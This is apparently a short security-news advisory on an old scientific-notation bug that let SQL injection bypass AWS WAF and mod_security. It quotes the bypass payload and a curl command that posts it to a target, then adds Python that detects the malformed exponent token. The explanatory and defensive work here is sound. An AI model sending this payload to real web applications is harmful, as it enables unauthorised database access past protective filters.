Scientific notation bug bypasses AWS WAF protection
AWS WAF and the mod_security Apache module were affected by a scientific notation bug, discovered back in 2013, that allowed an attacker to bypass the WAF and successfully exploit a SQL injection vulnerability.
The payload used for the attack, showing the scientific notation, is below:
"x=1' or 1.e(1) or '1'='1"
By executing the following command, it was possible to bypass the WAF's SQL injection protection and exploit a SQL injection in the underlying web application:
$ curl -i -H "Origin: http://domain" -X POST \
    "http://$DOMAIN/index.php" -d "x=1' or 1.e(1) or '1'='1"
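
A defensive check for the token in the payload above, as an added example that is not part of the original page: it decodes a form-encoded body and flags numeric literals whose `e` exponent marker is not followed by digits, as in `1.e(1)`. The function name, the regular expression and the sample bodies (other than the page's payload) are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Mantissa, then e/E that is NOT followed by exponent digits (or by letters,
# which keeps hex-like strings such as "1ef0" from matching).
MALFORMED_EXPONENT = re.compile(
    r"(?<![\w.])\d+(?:\.\d*)?[eE](?![+-]?\d)(?![A-Za-z_])"
)

def find_malformed_exponents(body):
    """Return (parameter, token) pairs for a form-encoded request body."""
    hits = []
    # parse_qsl percent-decodes names and values, so the check sees the
    # same text the application would.
    for name, value in parse_qsl(body, keep_blank_values=True):
        for match in MALFORMED_EXPONENT.finditer(value):
            hits.append((name, match.group(0)))
    return hits

# Constructed sample bodies; the first is the payload quoted on this page.
SAMPLES = [
    "x=1' or 1.e(1) or '1'='1",
    "price=1.5e10&qty=3",
    "mass=6.02E-23",
    "hash=1ef0",
]

if __name__ == "__main__":
    for body in SAMPLES:
        hits = find_malformed_exponents(body)
        print("FLAG" if hits else "ok  ", repr(body), hits)
```

This is a heuristic signal for logging or review alongside the WAF, not a replacement for parameterized queries in the application.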